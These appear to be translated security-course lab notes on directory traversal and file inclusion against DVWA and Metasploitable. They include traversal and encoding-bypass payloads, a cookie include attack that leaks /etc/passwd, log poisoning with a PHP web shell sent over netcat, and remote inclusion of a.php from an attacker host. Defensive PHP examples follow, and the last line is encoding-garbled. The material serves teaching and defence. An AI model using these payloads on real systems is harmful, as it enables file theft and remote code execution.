Manual vulnerability discovery
Directory traversal / File include (with distinction / without distinction)
  Directory permissions not strictly restricted / file inclusion
/etc/php5/cgi/php.ini
  allow_url_include = on
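Application features operate on files; when restrictions are lax, files outside the web directory can be accessed
  Read files, write files, remote code execution
Typical characteristics (not absolute)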
  ?page=a.php
  ?home=b.html
  ?file=content
[email protected]:~$ ifconfig
[email protected]:~$ sudo vi /etc/php5/cgi/php.ini
allow_url_include = ON
[email protected]:~$ sudo /etc/init.d/apache2 restart
Manual vulnerability discovery
Classic test methods
  ?file=../../../../etc/passwd
  ?page=file:///etc/passwd
  ?home=main.cgi
  ?page=http://www.a.com/1.php
  http://1.1.1.1/../../../../dir/file.txt
Encoding to bypass character filtering
  "."  "%00"    # bypass file-extension filtering
    file=a.doc%00.php
  Try multiple encodings
[email protected]:~# pwd
[email protected]:~# cd .            // current directory
[email protected]:~# cd ../../         // root directory
[email protected]:~# cd ../../../../      // jump to the root directory
Manual vulnerability discovery
Path characters on different operating systems
  Unix-like systems
    Root directory: /
    Directory separator: /
  Windows systems
    C:\
    \ or /
Manual vulnerability discovery
  URL encoding, double URL encoding
    %2e%2e%2f    decodes to: ../
    %2e%2e%5c    decodes to: ..\
    %252e%252e%255c decodes to: ..\
  Unicode/UTF-8 encoding
    ..%c0%af     decodes to: ../
    ..%u2216
    ..%c1%9c     decodes to: ..\
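The decodings listed above, as an added example that is not part of the original notes: a PHP script that decodes a raw request value until it stops changing and only then checks it, next to a check that decodes once and looks for ../ only. The function names and the five-round limit are assumptions; the sample values are the ones from the lists above.

```php
<?php
// Added example: canonicalise a raw request value before matching on it.
// canonicalize(), flags() and the round limit are illustrative assumptions.

function canonicalize(string $raw, int $maxRounds = 5): string
{
    $s = $raw;
    for ($i = 0; $i < $maxRounds; $i++) {
        // IIS-style %uXXXX: U+2215 and U+2216 are best-fit mapped to / and \
        $next = preg_replace_callback('/%u([0-9a-f]{4})/i', function ($m) {
            $cp = hexdec($m[1]);
            if ($cp === 0x2215) return '/';
            if ($cp === 0x2216) return '\\';
            return $cp < 0x80 ? chr($cp) : $m[0];
        }, $s);
        $next = rawurldecode($next);      // strip one layer of %XX encoding
        if ($next === $s) break;          // stable: nothing left to decode
        $s = $next;
    }
    // Overlong two-byte UTF-8 forms of '/' (C0 AF) and '\' (C1 9C)
    $s = str_replace(["\xC0\xAF", "\xC1\x9C"], ['/', '\\'], $s);
    return str_replace('\\', '/', $s);    // one separator to match on
}

function flags(string $raw): array
{
    $c = canonicalize($raw);
    $out = [];
    if (preg_match('#(^|/)\.\.(/|$)#', $c)) $out[] = 'traversal';
    if (strpos($c, "\0") !== false)         $out[] = 'null-byte';
    return $out;
}

// Sample values copied from the encoding lists in these notes.
$samples = ['%2e%2e%2f', '%2e%2e%5c', '%252e%252e%255c', '..%c0%af',
            '..%u2216', '..%c1%9c', 'a.doc%00.php', 'include.php'];
foreach ($samples as $raw) {
    // Naive check: decode once and look for ../ only
    $naive = strpos(rawurldecode($raw), '../') !== false ? 'hit' : 'miss';
    printf("%-18s naive=%-4s canonical=%s\n", $raw, $naive,
           implode(',', flags($raw)) ?: 'clean');
}
```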
Manual vulnerability discovery
Other characters that system paths may accept
  file.txt....
  file.txt<spaces>
  file.txt""""
  file.txt<<<>>><
  ./././file.txt
  nonexistant/../file.txt
UNC paths
  \\1.1.1.1\path\to\file.txt
[email protected]:~# cd a
[email protected]:~# cd a/../a.txt
Manual vulnerability discovery
Code <?php
   $template = 'blue.php';
   // The cookie value is used in the include path without validation
   if ( isset( $_COOKIE['TEMPLATE'] ) )
     $template = $_COOKIE['TEMPLATE'];
   include ( "/home/users/phpguru/templates/" . $template );
   ?>
Attack GET /vulnerable.php HTTP/1.0
   Cookie: TEMPLATE=../../../../../../../../../etc/passwd
Result HTTP/1.0 200 OK
   Content-Type: text/html
   Server:Apache
   root:fi3sED95ibqR6:0:1:System Operator:/:/bin/ksh
   daemon:*:1:1::/tmp:
   phpguru:f8fk3j1OIf31.:182:100:Developer:/home/users/phpguru/:/bin/csh
Manual vulnerability discovery
Local file inclusion (LFI)
  View files
  Code execution
    <?php echo shell_exec($_GET['cmd']);?>
    Apache access.log
Remote file inclusion (RFI)
  Occurs less often than LFI, but is easier to exploit
[email protected]:~$ cd /var/log/apache2/
[email protected]:~/var/log/apache2$ cat access.log
[email protected]:~# nc 192.168.1.118 80
<?php echo shell_exec($_GET['cmd']);?>
HTTP/1.1 400 Bad Request
Date: Mon, 18 Jan 2016 12:19:29 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.2.8 (Ubuntu) DAV/2 Server at metasploitable.localdomain Port 80</address>
</body></html>
[email protected]:~/var/log/apache2$ ls -l access.log
[email protected]:~/var/log/apache2$ cd ..
[email protected]:~/var/log$ sudo chmod a+xr apache2/
[email protected]:~/var/log$ ls -ld apache2/
[email protected]:~/var/log$ cd ..
[email protected]:~/var$ ls -ld log
[email protected]:~/var$ cd ..
[email protected]:~$ ls -ld var/
[email protected]:~$ cd /var/log/apache2/
[email protected]:~/var/log/apache2$ cat access.log
192.168.1.168/dvwa/vulnerabilities/fi/?page=http://192.168.1.119/a.php
[email protected]:~# nc -nvlp 80
listening on [any] 80 ...
connect to [192.168.1.119] from (UNKNOWN) [192.168.1.118] 52612
GET /a.php HTTP/1.0
Host: 192.168.1.119
--------------------------------------------------------------------
<?php
  $file = $_GET['page']; //The page we wish to display
?>
----------------------------------------------------------------------
<?php
  $file = $_GET['page']; //The page we wish to display
  // Only allow include.php
  if ( $file != "include.php" ) {
    echo "ERROR: File not found!";
    exit;
  }
?>
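A hardened counterpart to the TEMPLATE cookie include and the DVWA page include shown above, as an added example that is not DVWA's or the course's code: the name must match a strict file-name pattern, and the resolved path must still sit inside the template directory. safe_template() and the temporary directory are assumptions; the rejected inputs are the test strings from these notes.

```php
<?php
// Added example: resolve a template name inside one directory only.
// safe_template() and the temp-directory fixture are illustrative assumptions.

function safe_template(string $baseDir, string $name): ?string
{
    // Plain file names only: no separators, NUL bytes, URL schemes or dot-dot
    if (!preg_match('/\A[A-Za-z0-9_-]+\.php\z/', $name)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name); // resolves symlinks
    if ($base === false || $path === false) {
        return null;                              // missing file or directory
    }
    // Containment: the resolved path must still be under the base directory
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed fixture: a temporary directory holding one template.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'tpl_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'blue.php', "<?php echo 'blue';\n");

$inputs = ['blue.php', '../../../../etc/passwd', 'file:///etc/passwd',
           'http://www.a.com/1.php', "a.doc\0.php", 'missing.php'];
foreach ($inputs as $in) {
    $ok = safe_template($dir, $in);
    printf("%-28s %s\n", addcslashes($in, "\0"),
           $ok === null ? 'rejected' : 'include ' . basename($ok));
}

unlink($dir . DIRECTORY_SEPARATOR . 'blue.php');
rmdir($dir);
```

Outside a lab, allow_url_include stays off in php.ini, so include refuses http:// and ftp:// sources even if a check like this is bypassed.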
该ç¬è®°ä¸ºå®å ¨ç课å å¦åç¬è®°ï¼æ³çæ¤è¯¾ç¨æè ä¿¡æ¯å®å ¨ç±»å¹²è´§å¯ä»¥ç§»æ¥å°å®å ¨ç课å